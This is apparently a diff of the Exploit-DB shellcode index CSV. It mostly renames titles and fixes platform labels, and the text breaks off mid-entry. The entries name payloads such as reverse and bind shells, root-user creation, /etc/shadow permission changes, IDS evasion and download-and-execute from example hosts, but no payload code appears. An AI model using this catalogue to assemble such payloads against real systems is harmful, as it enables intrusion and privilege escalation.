+13360,shellcodes/linux_x86/13360.c,"Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + setuid() Shellcode (96 bytes)",2006-07-20,"Marco Ivaldi",shellcode,linux_x86
 13361,shellcodes/linux_x86/13361.c,"Linux/x86 - Bind TCP (2707/TCP) Shell Shellcode (84 bytes)",2006-07-04,oveRet,shellcode,linux_x86
-13362,shellcodes/linux_x86/13362.c,"Linux/x86 - execve Diassembly Obfuscation Shellcode (32 bytes)",2006-05-14,BaCkSpAcE,shellcode,linux_x86
+13362,shellcodes/linux_x86/13362.c,"Linux/x86 - execve() Diassembly Obfuscation Shellcode (32 bytes)",2006-05-14,BaCkSpAcE,shellcode,linux_x86
 13363,shellcodes/linux_x86/13363.c,"Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) Shellcode (100 bytes)",2006-05-08,"Benjamin Orozco",shellcode,linux_x86
 13364,shellcodes/generator/13364.c,"Linux/x86 - Reverse TCP (192.168.13.22:31337/TCP) Shell (/bin/sh) Shellcode (82 bytes) (Generator)",2006-05-08,"Benjamin Orozco",shellcode,generator
-13365,shellcodes/linux_x86/13365.c,"Linux/x86 - execve /bin/sh Shellcode (24 bytes) (2)",2006-05-01,hophet,shellcode,linux_x86
+13365,shellcodes/linux_x86/13365.c,"Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (2)",2006-05-01,hophet,shellcode,linux_x86
 13366,shellcodes/linux_x86/13366.txt,"Linux/x86 - Reverse TCP (127.0.0.1:80/TCP) Shell + XOR Encoded Shellcode (371 bytes)",2006-04-18,xort,shellcode,linux_x86
-13367,shellcodes/linux_x86/13367.c,"Linux/x86 - execve /bin/sh + '.ZIP' Header Shellcode (28 bytes)",2006-04-17,izik,shellcode,linux_x86
-13368,shellcodes/linux_x86/13368.c,"Linux/x86 - execve /bin/sh + '.RTF' Header Shellcode (30 bytes)",2006-04-17,izik,shellcode,linux_x86
-13369,shellcodes/linux_x86/13369.c,"Linux/x86 - execve /bin/sh + '.RIFF' Header Shellcode (28 bytes)",2006-04-17,izik,shellcode,linux_x86
-13370,shellcodes/linux_x86/13370.c,"Linux/x86 - execve /bin/sh + '.BMP' Bitmap Header Shellcode (27 bytes)",2006-04-17,izik,shellcode,linux_x86
+13367,shellcodes/linux_x86/13367.c,"Linux/x86 - execve(/bin/sh) + '.ZIP' Header Shellcode (28 bytes)",2006-04-17,izik,shellcode,linux_x86
+13368,shellcodes/linux_x86/13368.c,"Linux/x86 - execve(/bin/sh) + '.RTF' Header Shellcode (30 bytes)",2006-04-17,izik,shellcode,linux_x86
+13369,shellcodes/linux_x86/13369.c,"Linux/x86 - execve(/bin/sh) + '.RIFF' Header Shellcode (28 bytes)",2006-04-17,izik,shellcode,linux_x86
+13370,shellcodes/linux_x86/13370.c,"Linux/x86 - execve(/bin/sh) + '.BMP' Bitmap Header Shellcode (27 bytes)",2006-04-17,izik,shellcode,linux_x86
 13371,shellcodes/linux_x86/13371.c,"Linux/x86 - Read SWAP + Write To /tmp/swr Shellcode (109 bytes)",2006-04-16,"Gotfault Security",shellcode,linux_x86
 13372,shellcodes/linux_x86/13372.c,"Linux/x86 - Read /tmp/sws + Store In SWAP Shellcode (99 bytes)",2006-04-16,"Gotfault Security",shellcode,linux_x86
 13373,shellcodes/linux_x86/13373.c,"Linux/x86 - Bind TCP (64713/TCP) Shell (/bin/sh) + Password (gotfault) Shellcode (166 bytes)",2006-04-06,"Gotfault Security",shellcode,linux_x86
@@ -137,11 +137,11 @@ id,file,description,date,author,type,platform
 13379,shellcodes/linux_x86/13379.c,"Linux/x86 - setreuid(0_0) + execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (33 bytes)",2006-04-03,"Gotfault Security",shellcode,linux_x86
 13380,shellcodes/linux_x86/13380.c,"Linux/x86 - Download File (HTTP/1.x http://127.0.0.1:8081/foobar.bin) + Receive Shellcode + Payload Loader Shellcode (68+ bytes)",2006-03-12,izik,shellcode,linux_x86
 13381,shellcodes/linux_x86/13381.c,"Linux/x86 - TCP Proxy (192.168.1.16:1280/TCP) All Connect() Null-Free Shellcode (236 bytes)",2006-02-07,phar,shellcode,linux_x86
-13382,shellcodes/linux_x86/13382.c,"Linux/x86 - execve /bin/sh Anti-IDS Shellcode (40 bytes)",2006-01-26,NicatiN,shellcode,linux_x86
-13383,shellcodes/linux_x86/13383.c,"Linux/x86 (Intel x86 CPUID) - execve /bin/sh XORED Encoded Shellcode (41 bytes)",2006-01-25,izik,shellcode,linux_x86
-13384,shellcodes/linux_x86/13384.c,"Linux/x86 - execve /bin/sh Shellcode +1 Encoded (39 bytes)",2006-01-25,izik,shellcode,linux_x86
+13382,shellcodes/linux_x86/13382.c,"Linux/x86 - execve(/bin/sh) + Anti-IDS Shellcode (40 bytes)",2006-01-26,NicatiN,shellcode,linux_x86
+13383,shellcodes/linux_x86/13383.c,"Linux/x86 (Intel x86 CPUID) - execve(/bin/sh) XORED Encoded Shellcode (41 bytes)",2006-01-25,izik,shellcode,linux_x86
+13384,shellcodes/linux_x86/13384.c,"Linux/x86 - execve(/bin/sh) Shellcode +1 Encoded (39 bytes)",2006-01-25,izik,shellcode,linux_x86
 13385,shellcodes/linux_x86/13385.c,"Linux/x86 - Add Root User (xtz) To /etc/passwd Shellcode (59 bytes)",2006-01-21,izik,shellcode,linux_x86
-13386,shellcodes/linux_x86/13386.c,"Linux/x86 - Anti-Debug Trick (INT 3h trap) + execve /bin/sh Shellcode (39 bytes)",2006-01-21,izik,shellcode,linux_x86
+13386,shellcodes/linux_x86/13386.c,"Linux/x86 - Anti-Debug Trick (INT 3h trap) + execve(/bin/sh) Shellcode (39 bytes)",2006-01-21,izik,shellcode,linux_x86
 13387,shellcodes/linux_x86/13387.c,"Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) Shellcode (80 bytes)",2006-01-21,izik,shellcode,linux_x86
 13388,shellcodes/linux_x86/13388.c,"Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + fork() Shellcode (98 bytes)",2006-01-21,izik,shellcode,linux_x86
 13389,shellcodes/linux_x86/13389.c,"Linux/x86 - Open CD-Rom Loop 24/7 (Follows /dev/cdrom Symlink) Shellcode (39 bytes)",2006-01-21,izik,shellcode,linux_x86
@@ -153,8 +153,8 @@ id,file,description,date,author,type,platform
 13395,shellcodes/linux_x86/13395.c,"Linux/x86 - getppid() + execve(/proc/pid/exe) Shellcode (51 bytes)",2006-01-21,izik,shellcode,linux_x86
 13396,shellcodes/linux_x86/13396.c,"Linux/x86 - Quick (yet conditional_ eax != 0 and edx == 0) exit Shellcode (4 bytes)",2006-01-21,izik,shellcode,linux_x86
 13397,shellcodes/linux_x86/13397.c,"Linux/x86 - reboot() Shellcode (20 bytes)",2006-01-21,izik,shellcode,linux_x86
-13398,shellcodes/linux_x86/13398.c,"Linux/x86 - setreuid(0_ 0) + execve /bin/sh Shellcode (31 bytes)",2006-01-21,izik,shellcode,linux_x86
-13399,shellcodes/linux_x86/13399.c,"Linux/x86 - execve /bin/sh + PUSH Shellcode (23 bytes)",2006-01-21,izik,shellcode,linux_x86
+13398,shellcodes/linux_x86/13398.c,"Linux/x86 - setreuid(0_ 0) + execve(/bin/sh) Shellcode (31 bytes)",2006-01-21,izik,shellcode,linux_x86
+13399,shellcodes/linux_x86/13399.c,"Linux/x86 - execve(/bin/sh) + PUSH Shellcode (23 bytes)",2006-01-21,izik,shellcode,linux_x86
 13400,shellcodes/linux_x86/13400.c,"Linux/x86 - cat /dev/urandom > /dev/console Shellcode (63 bytes)",2006-01-21,izik,shellcode,linux_x86
 13401,shellcodes/generator/13401.c,"Linux/x86 - Reverse TCP Shell Shellcode (90 bytes) (Generator)",2005-12-28,xort,shellcode,generator
 13402,shellcodes/linux_x86/13402.c,"Linux/x86 - Socket-Proxy (31337:11.22.33.44:80) Shellcode (372 bytes)",2005-12-28,xort,shellcode,linux_x86
@@ -164,28 +164,28 @@ id,file,description,date,author,type,platform 13406,shellcodes/linux_x86/13406.c,"Linux/x86 - read(0_buf_2541) + chmod(buf_4755) Shellcode (23 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_x86 13407,shellcodes/linux_x86/13407.c,"Linux/x86 - write(0__Hello core!\n__12) + Exit Shellcode (36/43 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_x86 13408,shellcodes/linux_x86/13408.c,"Linux/x86 - Snoop /dev/dsp Null-Free Shellcode (172 bytes)",2005-11-04,phar,shellcode,linux_x86 -13409,shellcodes/linux_x86/13409.c,"Linux/x86 - execve /bin/sh Standard Opcode Array Payload Shellcode (21 bytes)",2005-09-15,c0ntex,shellcode,linux_x86 +13409,shellcodes/linux_x86/13409.c,"Linux/x86 - execve(/bin/sh) Standard Opcode Array Payload Shellcode (21 bytes)",2005-09-15,c0ntex,shellcode,linux_x86 13410,shellcodes/linux_x86/13410.s,"Linux/x86 - Hide-Wait-Change (Hide from PS + Wait for /tmp/foo + chmod 0455) Shellcode (187+ bytes) (2)",2005-09-09,xort,shellcode,linux_x86 13411,shellcodes/linux_x86/13411.c,"Linux/x86 - Hide-Wait-Change (Hide from PS + Wait for /tmp/foo + chmod 0455) Shellcode (187+ bytes) (1)",2005-09-08,xort,shellcode,linux_x86 -13412,shellcodes/linux_x86/13412.c,"Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (23 bytes)",2005-09-04,BaCkSpAcE,shellcode,linux_x86 -13413,shellcodes/linux_x86/13413.c,"Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (27 bytes)",2005-08-25,amnesia,shellcode,linux_x86 -13414,shellcodes/linux_x86/13414.c,"Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (45 bytes)",2005-08-19,c0ntex,shellcode,linux_x86 -13415,shellcodes/linux_x86/13415.c,"Linux/x86 - Break chroot (../ 20x Loop) + execve /bin/sh Shellcode (66 bytes)",2005-07-11,Okti,shellcode,linux_x86 +13412,shellcodes/linux_x86/13412.c,"Linux/x86 - execve(/bin/sh) sysenter Opcode Array Payload Shellcode (23 bytes)",2005-09-04,BaCkSpAcE,shellcode,linux_x86 
+13413,shellcodes/linux_x86/13413.c,"Linux/x86 - execve(/bin/sh) sysenter Opcode Array Payload Shellcode (27 bytes)",2005-08-25,amnesia,shellcode,linux_x86 +13414,shellcodes/linux_x86/13414.c,"Linux/x86 - execve(/bin/sh) sysenter Opcode Array Payload Shellcode (45 bytes)",2005-08-19,c0ntex,shellcode,linux_x86 +13415,shellcodes/linux_x86/13415.c,"Linux/x86 - Break chroot (../ 20x Loop) + execve(/bin/sh) Shellcode (66 bytes)",2005-07-11,Okti,shellcode,linux_x86 13416,shellcodes/linux_x86/13416.txt,"Linux/x86 - upload + exec Shellcode (189 bytes)",2005-06-19,cybertronic,shellcode,linux_x86 -13417,shellcodes/linux_x86/13417.c,"Linux/x86 - setreuid + execve Shellcode (31 bytes)",2004-12-26,oc192,shellcode,linux_x86 +13417,shellcodes/linux_x86/13417.c,"Linux/x86 - setreuid() + execve() Shellcode (31 bytes)",2004-12-26,oc192,shellcode,linux_x86 13418,shellcodes/linux_x86/13418.c,"Linux/x86 - Alphanumeric Encoded Shellcode (64 bytes)",2004-12-22,xort,shellcode,linux_x86 13419,shellcodes/linux_x86/13419.c,"Linux/x86 - Alphanumeric Encoder (IMUL Method) Shellcode (88 bytes)",2004-12-22,xort,shellcode,linux_x86 13420,shellcodes/linux_x86/13420.c,"Linux/x86 - Self-Modifying Radical Shellcode (70 bytes)",2004-12-22,xort,shellcode,linux_x86 13421,shellcodes/linux_x86/13421.c,"Linux/x86 - Self-Modifying Magic Byte /bin/sh Shellcode (76 bytes)",2004-12-22,xort,shellcode,linux_x86 -13422,shellcodes/linux_x86/13422.c,"Linux/x86 - execve code Shellcode (23 bytes)",2004-11-15,marcetam,shellcode,linux_x86 +13422,shellcodes/linux_x86/13422.c,"Linux/x86 - execve() Shellcode (23 bytes)",2004-11-15,marcetam,shellcode,linux_x86 13423,shellcodes/linux_x86/13423.c,"Linux/x86 - execve(_/bin/ash__0_0) Shellcode (21 bytes)",2004-11-15,zasta,shellcode,linux_x86 -13424,shellcodes/linux_x86/13424.txt,"Linux/x86 - execve /bin/sh Alphanumeric Shellcode (392 bytes)",2004-09-26,RaiSe,shellcode,linux_x86 -13425,shellcodes/linux_x86/13425.c,"Linux/IA32 - execve /bin/sh 0xff-Free Shellcode (45 
bytes)",2004-09-26,anathema,shellcode,linux_x86 -13426,shellcodes/linux_x86/13426.c,"Linux/x86 - symlink /bin/sh xoring Shellcode (56 bytes)",2004-09-26,dev0id,shellcode,linux_x86 +13424,shellcodes/linux_x86/13424.txt,"Linux/x86 - execve(/bin/sh) Alphanumeric Shellcode (392 bytes)",2004-09-26,RaiSe,shellcode,linux_x86 +13425,shellcodes/linux_x86/13425.c,"Linux/IA32 - execve(/bin/sh) 0xff-Free Shellcode (45 bytes)",2004-09-26,anathema,shellcode,linux_x86 +13426,shellcodes/bsd_x86/13426.c,"BSD/x86 - symlink /bin/sh + XORing Encoded Shellcode (56 bytes)",2004-09-26,dev0id,shellcode,bsd_x86 13427,shellcodes/linux_x86/13427.c,"Linux/x86 - Bind TCP (5074/TCP) Shell + ToUpper Encoded Shellcode (226 bytes)",2004-09-26,Tora,shellcode,linux_x86 -13428,shellcodes/linux_x86/13428.c,"Linux/x86 - Add Root User (t00r) Anti-IDS Shellcode (116 bytes)",2004-09-26,"Matias Sedalo",shellcode,linux_x86 -13429,shellcodes/linux_x86/13429.c,"Linux/x86 - chmod 666 /etc/shadow Anti-IDS Shellcode (75 bytes)",2004-09-26,"Matias Sedalo",shellcode,linux_x86 -13430,shellcodes/linux_x86/13430.c,"Linux/x86 - symlink . /bin/sh Shellcode (32 bytes)",2004-09-26,dev0id,shellcode,linux_x86 +13428,shellcodes/linux_x86/13428.c,"Linux/x86 - Add Root User (t00r) + Anti-IDS Shellcode (116 bytes)",2004-09-26,"Matias Sedalo",shellcode,linux_x86 +13429,shellcodes/linux_x86/13429.c,"Linux/x86 - chmod 666 /etc/shadow + Anti-IDS Shellcode (75 bytes)",2004-09-26,"Matias Sedalo",shellcode,linux_x86 +13430,shellcodes/bsd_x86/13430.c,"BSD/x86 - symlink . /bin/sh Shellcode (32 bytes)",2004-09-26,dev0id,shellcode,bsd_x86 13431,shellcodes/linux_x86/13431.c,"Linux/x86 - Kill Snort Shellcode (151 bytes)",2004-09-26,nob0dy,shellcode,linux_x86 13432,shellcodes/linux_x86/13432.c,"Linux/x86 - Execute At Shared Memory Shellcode (50 bytes)",2004-09-26,sloth,shellcode,linux_x86 13433,shellcodes/linux_x86/13433.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (45 bytes)",2004-09-26,UnboundeD,shellcode,linux_x86 
@@ -198,66 +198,67 @@ id,file,description,date,author,type,platform 13440,shellcodes/linux_x86/13440.c,"Linux/x86 - xterm -ut -display 1270.0.0.1:0 Shellcode (132 bytes)",2004-09-26,RaiSe,shellcode,linux_x86 13441,shellcodes/linux_x86/13441.c,"Linux/x86 - Flush IPChains Rules (/sbin/ipchains -F) Shellcode (49 bytes)",2004-09-26,Sp4rK,shellcode,linux_x86 13442,shellcodes/linux_x86/13442.c,"Linux/x86 - chmod 666 /etc/shadow Shellcode (82 bytes)",2004-09-26,"Matias Sedalo",shellcode,linux_x86 -13443,shellcodes/linux_x86/13443.c,"Linux/x86 - execve /bin/sh Shellcode (29 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86 -13444,shellcodes/linux_x86/13444.c,"Linux/x86 - execve /bin/sh Shellcode (24 bytes) (3)",2004-09-12,"Matias Sedalo",shellcode,linux_x86 -13445,shellcodes/linux_x86/13445.c,"Linux/x86 - execve /bin/sh Shellcode (38 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86 -13446,shellcodes/linux_x86/13446.c,"Linux/x86 - execve /bin/sh Shellcode (30 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86 -13447,shellcodes/linux_x86/13447.c,"Linux/x86 - execve /bin/sh + setreuid(12_12) Shellcode (50 bytes)",2004-09-12,anonymous,shellcode,linux_x86 +13443,shellcodes/linux_x86/13443.c,"Linux/x86 - execve(/bin/sh) Shellcode (29 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86 +13444,shellcodes/linux_x86/13444.c,"Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (3)",2004-09-12,"Matias Sedalo",shellcode,linux_x86 +13445,shellcodes/linux_x86/13445.c,"Linux/x86 - execve(/bin/sh) Shellcode (38 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86 +13446,shellcodes/linux_x86/13446.c,"Linux/x86 - execve(/bin/sh) Shellcode (30 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86 +13447,shellcodes/linux_x86/13447.c,"Linux/x86 - execve(/bin/sh) + setreuid(12_12) Shellcode (50 bytes)",2004-09-12,anonymous,shellcode,linux_x86 13448,shellcodes/linux_x86/13448.c,"Linux/x86 - Bind TCP (5074/TCP) Shell Shellcode (92 bytes)",2004-09-12,"Matias 
Sedalo",shellcode,linux_x86 13449,shellcodes/linux_x86/13449.c,"Linux/x86 - Bind TCP (5074/TCP) Shell + fork() Shellcode (130 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86 13450,shellcodes/linux_x86/13450.c,"Linux/x86 - Add Root User (t00r) Shellcode (82 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86 13451,shellcodes/linux_x86/13451.c,"Linux/x86 - Add Root User Shellcode (104 bytes)",2004-09-12,"Matt Conover",shellcode,linux_x86 -13452,shellcodes/linux_x86/13452.c,"Linux/x86 - Break chroot (../ 10x Loop) Shellcode (34 bytes)",2004-09-12,dev0id,shellcode,linux_x86 -13453,shellcodes/linux_x86/13453.c,"Linux/x86 - Break chroot (../ 10x Loop) Shellcode (46 bytes)",2004-09-12,dev0id,shellcode,linux_x86 -13454,shellcodes/linux_x86/13454.c,"Linux/x86 - Break chroot + execve /bin/sh Shellcode (80 bytes)",2004-09-12,preedator,shellcode,linux_x86 -13455,shellcodes/linux_x86/13455.c,"Linux/x86 - execve /bin/sh Anti-IDS Shellcode (58 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86 -13456,shellcodes/linux_x86/13456.c,"Linux/x86 - execve /bin/sh XOR Encoded Shellcode (55 bytes)",2004-09-12,anonymous,shellcode,linux_x86 -13457,shellcodes/linux_x86/13457.c,"Linux/x86 - execve /bin/sh ToLower Encoded Shellcode (41 bytes)",2004-09-12,anonymous,shellcode,linux_x86 -13458,shellcodes/linux_x86/13458.c,"Linux/x86 - setreuid(0_0) + execve /bin/sh Shellcode (46+ bytes)",2001-05-07,"Marco Ivaldi",shellcode,linux_x86 -13460,shellcodes/linux_x86/13460.c,"Linux/x86 - execve /bin/sh ToLower Encoded Shellcode (55 bytes)",2000-08-08,anonymous,shellcode,linux_x86 +13452,shellcodes/linux_x86/13452.c,"Linux/x86 - Break chroot (../ 10x Loop) Shellcode (28 bytes)",2004-09-12,dev0id,shellcode,linux_x86 +43633,shellcodes/openbsd_x86/43633.c,"OpenBSD/x86 - Load Kernel Module (/tmp/o.o) Shellcode (66 bytes)",2009-01-01,dev0id,shellcode,openbsd_x86 +13453,shellcodes/bsd_x86/13453.c,"BSD/x86 - setuid(0) + Break chroot (../ 10x Loop) Shellcode (46 
bytes)",2004-09-12,dev0id,shellcode,bsd_x86 +13454,shellcodes/linux_x86/13454.c,"Linux/x86 - Break chroot + execve(/bin/sh) Shellcode (80 bytes)",2004-09-12,preedator,shellcode,linux_x86 +13455,shellcodes/linux_x86/13455.c,"Linux/x86 - execve(/bin/sh) + Anti-IDS Shellcode (58 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86 +13456,shellcodes/linux_x86/13456.c,"Linux/x86 - execve(/bin/sh) XOR Encoded Shellcode (55 bytes)",2004-09-12,anonymous,shellcode,linux_x86 +13457,shellcodes/linux_x86/13457.c,"Linux/x86 - execve(/bin/sh) ToLower Encoded Shellcode (41 bytes)",2004-09-12,anonymous,shellcode,linux_x86 +13458,shellcodes/linux_x86/13458.c,"Linux/x86 - setreuid(0_0) + execve(/bin/sh) Shellcode (46+ bytes)",2001-05-07,"Marco Ivaldi",shellcode,linux_x86 +13460,shellcodes/linux_x86/13460.c,"Linux/x86 - execve(/bin/sh) ToLower Encoded Shellcode (55 bytes)",2000-08-08,anonymous,shellcode,linux_x86 13461,shellcodes/linux_x86/13461.c,"Linux/x86 - Add Root User (z) Shellcode (70 bytes)",2000-08-07,anonymous,shellcode,linux_x86 -13462,shellcodes/linux_x86/13462.c,"Linux/x86 - setreuid(0_ 0) + Break chroot (mkdir/chdir/chroot _../_) + execve /bin/sh Shellcode (132 bytes)",2000-08-07,anonymous,shellcode,linux_x86 +13462,shellcodes/linux_x86/13462.c,"Linux/x86 - setreuid(0_ 0) + Break chroot (mkdir/chdir/chroot _../_) + execve(/bin/sh) Shellcode (132 bytes)",2000-08-07,anonymous,shellcode,linux_x86 13463,shellcodes/linux_x86-64/13463.c,"Linux/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (132 bytes)",2009-05-18,evil.xi4oyu,shellcode,linux_x86-64 -13464,shellcodes/linux_x86-64/13464.s,"Linux/x86-64 - execve /bin/sh Shellcode (33 bytes)",2006-11-02,hophet,shellcode,linux_x86-64 +13464,shellcodes/linux_x86-64/13464.s,"Linux/x86-64 - execve(/bin/sh) Shellcode (33 bytes)",2006-11-02,hophet,shellcode,linux_x86-64 13465,shellcodes/multiple/13465.c,"Linux/PPC / Linux/x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (99 bytes)",2005-11-15,"Charles 
Stevenson",shellcode,multiple 13466,shellcodes/multiple/13466.c,"OSX/PPC / OSX/x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (121 bytes)",2005-11-13,nemo,shellcode,multiple -13467,shellcodes/multiple/13467.c,"Linux/x86 / Unix/SPARC / IRIX/MIPS - execve /bin/sh Shellcode (141 bytes)",2004-09-12,dymitri,shellcode,multiple -13468,shellcodes/multiple/13468.c,"Linux/x86 / Unix/SPARC - execve /bin/sh Shellcode (80 bytes)",2004-09-12,dymitri,shellcode,multiple -13469,shellcodes/multiple/13469.c,"BSD/x86 / Linux/x86 - execve /bin/sh Shellcode (38 bytes)",2004-09-12,dymitri,shellcode,multiple +13467,shellcodes/multiple/13467.c,"Linux/x86 / Unix/SPARC / IRIX/MIPS - execve(/bin/sh) Shellcode (141 bytes)",2004-09-12,dymitri,shellcode,multiple +13468,shellcodes/multiple/13468.c,"Linux/x86 / Unix/SPARC - execve(/bin/sh) Shellcode (80 bytes)",2004-09-12,dymitri,shellcode,multiple +13469,shellcodes/multiple/13469.c,"BSD/x86 / Linux/x86 - execve(/bin/sh) Shellcode (38 bytes)",2004-09-12,dymitri,shellcode,multiple 13470,shellcodes/netbsd_x86/13470.c,"NetBSD/x86 - Kill All Processes Shellcode (23 bytes)",2009-06-18,anonymous,shellcode,netbsd_x86 13471,shellcodes/netbsd_x86/13471.c,"NetBSD/x86 - Reverse TCP (6666/TCP) Shell Shellcode (83 bytes)",2005-11-30,"p. minervini",shellcode,netbsd_x86 13472,shellcodes/netbsd_x86/13472.c,"NetBSD/x86 - setreuid(0_ 0) + execve(_/bin//sh__ ..._ NULL) Shellcode (29 bytes)",2005-11-30,"p. minervini",shellcode,netbsd_x86 13473,shellcodes/netbsd_x86/13473.c,"NetBSD/x86 - setreuid(0_ 0) + execve(_/bin//sh__ ..._ NULL) Shellcode (30 bytes)",2005-11-30,"p. 
minervini",shellcode,netbsd_x86 -13474,shellcodes/netbsd_x86/13474.txt,"NetBSD/x86 - execve /bin/sh Shellcode (68 bytes)",2004-09-26,humble,shellcode,netbsd_x86 -13475,shellcodes/openbsd_x86/13475.c,"OpenBSD/x86 - execve /bin/sh Shellcode (23 bytes)",2006-05-01,hophet,shellcode,openbsd_x86 +13474,shellcodes/netbsd_x86/13474.txt,"NetBSD/x86 - execve(/bin/sh) Shellcode (68 bytes)",2004-09-26,humble,shellcode,netbsd_x86 +13475,shellcodes/openbsd_x86/13475.c,"OpenBSD/x86 - execve(/bin/sh) Shellcode (23 bytes)",2006-05-01,hophet,shellcode,openbsd_x86 13476,shellcodes/openbsd_x86/13476.c,"OpenBSD/x86 - Bind TCP (6969/TCP) Shell Shellcode (148 bytes)",2004-09-26,"Sinan Eren",shellcode,openbsd_x86 13477,shellcodes/openbsd_x86/13477.c,"OpenBSD/x86 - Add Root User (w00w00) Shellcode (112 bytes)",2004-09-26,anonymous,shellcode,openbsd_x86 13478,shellcodes/osx_ppc/13478.c,"OSX/PPC - sync() + reboot() Shellcode (32 bytes)",2006-05-01,hophet,shellcode,osx_ppc 13479,shellcodes/osx_ppc/13479.c,"OSX/PPC - execve(/bin/sh) + exit() Shellcode (72 bytes)",2006-05-01,hophet,shellcode,osx_ppc 13480,shellcodes/osx_ppc/13480.c,"OSX/PPC - Add Root User (r00t) Shellcode (219 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc -13481,shellcodes/osx_ppc/13481.c,"OSX/PPC - execve /bin/sh Shellcode (72 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc +13481,shellcodes/osx_ppc/13481.c,"OSX/PPC - execve(/bin/sh) Shellcode (72 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc 13482,shellcodes/osx_ppc/13482.c,"OSX/PPC - Add inetd (/etc/inetd.conf) Backdoor (Bind 6969/TCP Shell) Shellcode (222 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc 13483,shellcodes/osx_ppc/13483.c,"OSX/PPC - Reboot Shellcode (28 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc -13484,shellcodes/osx_ppc/13484.c,"OSX/PPC - setuid(0) + execve /bin/sh Shellcode (88 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc +13484,shellcodes/osx_ppc/13484.c,"OSX/PPC - setuid(0) + execve(/bin/sh) Shellcode (88 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc 
13485,shellcodes/osx_ppc/13485.c,"OSX/PPC - Create /tmp/suid Shellcode (122 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc 13486,shellcodes/osx_ppc/13486.c,"OSX/PPC - Simple write() Shellcode (75 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc -13487,shellcodes/osx_ppc/13487.c,"OSX/PPC - execve /usr/X11R6/bin/xterm Shellcode (141 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc +13487,shellcodes/osx_ppc/13487.c,"OSX/PPC - execve(/usr/X11R6/bin/xterm) Shellcode (141 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc 13488,shellcodes/sco_x86/13488.c,"SCO/x86 - execve(_/bin/sh__ ..._ NULL) Shellcode (43 bytes)",2005-11-30,"p. minervini",shellcode,sco_x86 -13489,shellcodes/solaris_sparc/13489.c,"Solaris/SPARC - Download File (http://evil-dl/) + Execute (/tmp/ff) Shellcode (278 bytes)",2006-11-21,xort,shellcode,solaris_sparc +13489,shellcodes/solaris_mips/13489.c,"Solaris/MIPS - Download (http://10.1.1.2:80/evil-dl) + Execute (/tmp/ff) Shellcode (278 bytes)",2006-11-21,xort,shellcode,solaris_mips 13490,shellcodes/solaris_sparc/13490.c,"Solaris/SPARC - setreuid + Executes Command Shellcode (92+ bytes)",2006-10-21,bunker,shellcode,solaris_sparc -13491,shellcodes/generator/13491.c,"Solaris/SPARC - Reverse TCP (44434/TCP) Shell + XNOR Encoded Shellcode (600 bytes) (Generator)",2006-07-21,xort,shellcode,generator -13492,shellcodes/solaris_sparc/13492.c,"Solaris/SPARC - setreuid + execve Shellcode (56 bytes)",2005-11-20,lhall,shellcode,solaris_sparc +13491,shellcodes/generator/13491.c,"Solaris/MIPS - Reverse TCP (10.0.0.3:44434/TCP) Shell + XNOR Encoded Traffic Shellcode (600 bytes) (Generator)",2006-07-21,xort,shellcode,generator +13492,shellcodes/solaris_sparc/13492.c,"Solaris/SPARC - setreuid + execve() Shellcode (56 bytes)",2005-11-20,lhall,shellcode,solaris_sparc 13493,shellcodes/solaris_sparc/13493.c,"Solaris/SPARC - Bind TCP (6666/TCP) Shell Shellcode (240 bytes)",2005-11-20,lhall,shellcode,solaris_sparc -13494,shellcodes/solaris_sparc/13494.txt,"Solaris/SPARC - execve /bin/sh Shellcode 
(52 bytes)",2004-09-26,LSD-PLaNET,shellcode,solaris_sparc -13495,shellcodes/solaris_sparc/13495.c,"Solaris/SPARC - Bind TCP (6789/TCP) Shell (/bin/sh) Shellcode (228 bytes)",2004-09-26,"Claes Nyberg",shellcode,solaris_sparc -13496,shellcodes/solaris_sparc/13496.c,"Solaris/SPARC - Reverse TCP (192.168.1.4:5678/TCP) Shell (/bin/sh) Shellcode (204 bytes)",2004-09-26,"Claes Nyberg",shellcode,solaris_sparc +13494,shellcodes/solaris_sparc/13494.txt,"Solaris/SPARC - execve(/bin/sh) Shellcode (52 bytes)",2004-09-26,LSD-PLaNET,shellcode,solaris_sparc +13495,shellcodes/solaris_sparc/13495.c,"Solaris/SPARC - Bind TCP (6789/TCP) Shell (/bin/sh) Shellcode (228 bytes)",2004-09-26,"Claes M. Nyberg",shellcode,solaris_sparc +13496,shellcodes/solaris_sparc/13496.c,"Solaris/SPARC - Reverse TCP (192.168.1.4:5678/TCP) Shell (/bin/sh) Shellcode (204 bytes)",2004-09-26,"Claes M. Nyberg",shellcode,solaris_sparc 13497,shellcodes/solaris_sparc/13497.txt,"Solaris/SPARC - Bind TCP Shell Shellcode (240 